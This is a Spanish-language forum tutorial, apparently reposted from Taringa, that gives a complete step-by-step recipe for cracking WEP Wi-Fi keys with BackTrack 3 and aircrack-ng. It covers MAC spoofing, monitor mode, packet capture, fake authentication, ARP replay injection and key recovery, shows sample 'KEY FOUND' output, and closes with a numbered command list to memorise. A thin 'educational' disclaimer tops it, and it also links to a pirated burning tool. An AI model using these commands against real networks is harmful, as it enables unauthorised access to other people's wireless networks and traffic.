Sie sind auf Seite 1von 19

NOTA: Esta informacin slo debe utilizarse con fines educativos.

Hackear Claves WEP


Primero: Descargar Back|Track 3 .ISO Aqui: http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd Tambien puedes descargar Back|Track 3 .ISO Version USB Aqui: http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-usb

Segundo: Grabar la Imagen .ISO en un CD o en una memoria USB(Lo vamos a grabar con Alcohol 120%) Descargar Alcohol 120% Full Multilenguaje Aqui: http://lix.in/-4cf45c No sabes como grabar una imagen .ISO? Entra aqui: Grabar Una Imagen .ISO con Alcohol 120%

Tercero: Reiniciar la Computadora Con el CD dentro Cuando Inicie aparecera esta pantalla: (Le damos Enter)

Bueno, al iniciar por completo abrimos una Consola:

En la consola escribimos: airmon-ng stop eth1 (eth1, wlan0, eth0, o wlan1) (a mi me funciona eth1) airmon-ng stop eth1 (Enter)

Esto es para desabilitar el "monitor mode". Luego escribimos: ifconfig eth1 down (Enter)

Despues, escribimos lo siguiente: macchanger --mac 00:11:22:33:44:55 eth1 (Enter)

Luego escribir lo siguiente para activar el "monitor mode" airmon-ng start eth1 (Enter)

Ahora escribimos esto: airodump-ng eth1 (Enter)

Bueno, en esta imagen muestra las redes Inalambricas, mirenlo bien: (La red "Hacker" es la mia)

Presionamos Ctrl+C Y escribimos: airodump-ng -c (channel) -w wep123 --bssid (bssid) eth1 airodump-ng -c 6 -w wep123 --bssid 00:18:3A:AB:8F: D7 eth1 (Enter)

Nos aseguramos que la seal sea buena (De 40% a 100%)

Ahora abrimos una nueva consola, y escribimos: aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) eth1 aireplay-ng -1 0 -a 00:18:3A:AB:8F: D7 -h 00:11:22:33:44:55 -e Hacker eth1 (Enter)

Si te aparece esto los hiciste todo bien, si no intentalo de nuevo: 11:48:51 Sending Authentication Request (Open System)[ACK] 11:48:51 Authentication successful 11:48:51 Sending Association Request [ACK] 11:48:51 Association successful : - ) (AID: 1) Ahora escribimos esto: aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 eth1 aireplay-ng -3 -b 00:18:3A:AB:8F: D7 -h 00:11:22:33:44:55 eth1 (Enter)

Ahora esperamos que la casilla "Data" de la primera consola llegue a 50.000 (Recomendado) o 30.000

Finalmente, para conseguir la clave abrir nueva consola y escribir: aircrack-ng -b (bssid) wep123-01.cap aircrack-ng -b 00:18:3A:AB:8F: D7 wep123-01.cap (Enter)

Esperamos como 20 segundos y ::Key Found::

KEY FOUND! 20:22:91:25:30 (Solo le quitan todos los : y queda asi: 2022912530)

Bueno, esto a sido todo por hoy.. Seguro que pensaran que es muy complicado, pero NO lo es! Cuando lo comprendan, solo tendras que memorizar estos pasos o escribirlos en un papel! 1) airmon-ng stop eth1 2) ifconfig eth1 down 3) macchanger --mac 00:11:22:33:44:55 eth1 4) airmon-ng start eth1 5) airodump-ng eth1 Presionar control C 6) airodump-ng -c (channel) -w wep123 --bssid (bssid) eth1 Abrir otra consola 7) aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) eth1 8) aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 eth1 Abrir otra consola

9) aircrack-ng -b (bssid) wep123-01.cap

::::::::::::::::::::KEY FOUND::::::::::::::::::::

Espero que les sirva! Suerte PROXIMAMENTE: Hackear Claves WPA Y WPA2

Taringuero! manmiracle Copyright

Das könnte Ihnen auch gefallen